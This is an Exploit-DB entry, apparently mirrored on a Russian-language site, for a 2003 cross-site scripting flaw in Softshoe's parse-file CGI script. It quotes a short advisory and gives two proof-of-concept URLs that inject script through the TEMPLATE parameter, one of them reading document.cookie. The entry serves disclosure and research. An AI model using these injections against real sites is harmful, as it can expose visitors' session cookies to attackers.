- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22963
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- BAHAA NAAMNEH
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- N/A
- Дата публикации
- 2003-07-28
		Код:
	
	source: https://www.securityfocus.com/bid/8294/info
Softshoe is allegedly prone to cross-site scripting attacks. An attacker can exploit this issue by creating a malicious link that contains hostile HTML or script code to a site that is hosting the vulnerable software. If such a link is visited, the attacker-supplied code may be rendered in the user's web browser.
http://www.example.com/cgi-bin/parse-file?TEMPLATE=<script>alert('Bahaa');</script>
http://www.example.com/cgi-bin/parse-file?TEMPLATE=<script>alert
(document.cookie);</script>- Источник
- www.exploit-db.com
 
 
		